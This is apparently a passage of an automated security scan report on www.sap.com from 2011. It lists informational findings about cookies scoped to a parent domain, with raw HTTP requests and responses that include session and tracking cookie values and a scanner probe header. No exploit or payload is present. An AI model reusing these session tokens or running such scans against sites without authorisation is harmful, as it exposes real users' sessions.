Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000009,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:05 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...

11.30. http://www.sap.com/news-reader/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /news-reader/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news-reader/?articleID=17603&_=1318690575808 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-SAP-Referer: http://www.sap.comzzzzzz=yyyyy
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: /news-reader/index.epx?articleID=17603&_=1318690575808
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:52 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:52 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:51 GMT


11.31. http://www.sap.com/news-reader/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /news-reader/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news-reader/index.epx?articleID=17603&_=1318690575808 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:55 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:55 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:55 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:55 GMT
Content-Length: 50791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...

11.32. http://www.sap.com/partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42472
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:27 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:27 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:27 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...